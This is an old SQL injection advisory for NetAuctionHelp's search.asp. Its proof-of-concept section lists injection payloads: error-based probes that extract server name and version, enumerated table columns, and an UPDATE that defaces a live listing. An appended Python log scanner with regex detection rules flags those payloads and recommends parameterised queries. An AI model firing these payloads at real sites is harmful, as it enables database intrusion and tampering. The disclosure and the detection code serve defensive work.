
NetAuctionHelp SQL Injection
Aria-Security.net: NetAuctionHelp SQL Injection
Aria-Security Net
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1099
------------------------
Vendor: http://www.netauctionhelp.com

PoC:
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION]
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1--

search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@servername)--
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@version)--

tblAd.id
tblAd.aspectratio
tblAd.title
tblAd.imagepath
tblAd.startdate
tblAd.enddate
tblAd.id_seller
tblAd.descr

-1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');--

This statement will update the item shown at itemdetl.asp?id=1

Credit goes to Aria-Security.Net
Greetz: AurA
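
Added example (not part of the original advisory): a log check that flags requests to search.asp whose nsearch value carries the SQL fragments shown in the PoC lines above. The seven-field log layout, the sample log lines, the IP addresses and the rule names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed sample lines. Assumed field order:
# date time method uri-stem uri-query client-ip status
SAMPLE_LOG = """\
2008-01-10 10:00:01 GET /search.asp sort=ni&category=&categoryname=&kwsearch=&nsearch=antique+clock 192.0.2.10 200
2008-01-10 10:00:07 GET /search.asp sort=ni&category=&categoryname=&kwsearch=&nsearch=%27having+1%3D1-- 192.0.2.66 500
2008-01-10 10:00:09 GET /search.asp sort=ni&category=&categoryname=&kwsearch=&nsearch=1'+or+1=convert(int,@@version)-- 192.0.2.66 500
2008-01-10 10:00:15 GET /itemdetl.asp id=1 192.0.2.10 200
2008-01-10 10:00:20 GET /search.asp sort=ni&nsearch=O%27Brien+lamp 192.0.2.11 200
"""

# Rules applied to the URL-decoded nsearch value. A lone apostrophe
# (O'Brien) is not enough; it must be followed by SQL syntax.
RULES = {
    "quote_then_keyword": re.compile(
        r"'\s*(having|or|and|union|select|update|insert|delete|drop|exec)\b", re.I),
    "trailing_comment": re.compile(r"'.*--"),
    "mssql_global": re.compile(r"@@\w+"),
    "convert_cast": re.compile(r"\bconvert\s*\(", re.I),
}

def scan(log_text):
    """Return (client_ip, decoded nsearch, matched rule names) per suspicious request."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 7 or parts[0].startswith("#"):
            continue  # skip W3C header lines and malformed rows
        _date, _time, _method, stem, query, ip, _status = parts
        if stem.lower() != "/search.asp":
            continue
        # parse_qs splits on '&', then decodes %xx and '+' in each value
        for value in parse_qs(query, keep_blank_values=True).get("nsearch", []):
            matched = sorted(n for n, rx in RULES.items() if rx.search(value))
            if matched:
                hits.append((ip, value, matched))
    return hits

if __name__ == "__main__":
    for ip, value, matched in scan(SAMPLE_LOG):
        print(ip, repr(value), ",".join(matched))
```

Matching on request logs only surfaces attempts; the fix in search.asp itself is to bind nsearch as a query parameter instead of concatenating it into the SQL string.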
